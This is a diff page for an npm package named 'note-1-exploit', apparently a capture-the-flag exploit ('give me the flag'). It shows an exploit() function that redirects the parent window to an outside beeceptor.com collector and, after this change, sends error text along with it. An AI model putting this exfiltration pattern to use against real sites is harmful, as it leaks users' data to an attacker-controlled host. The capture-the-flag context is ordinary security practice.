note-1-exploit 1.0.22 → 1.0.23

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -14,7 +14,7 @@ async function exploit() {
14
14
  }).then(res => {
15
15
  window.parent.location.replace("https://omniman.free.beeceptor.com?q=success");
16
16
  })
17
- .catch((error) => window.parent.location.replace("https://omniman.free.beeceptor.com?q=fail"));
17
+ .catch((error) => window.parent.location.replace("https://omniman.free.beeceptor.com?q=fail" + error.toString()));
18
18
  // window.parent.location.replace("https://omniman.free.beeceptor.com?q=hahahaha")
19
19
  // let json_results = await all_results.json();
20
20
  // let note_name = (Math.random() + 1).toString(36).substring(7);
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "note-1-exploit",
3
- "version": "1.0.22",
3
+ "version": "1.0.23",
4
4
  "description": "give me the flag",
5
5
  "main": "index.js",
6
6
  "scripts": {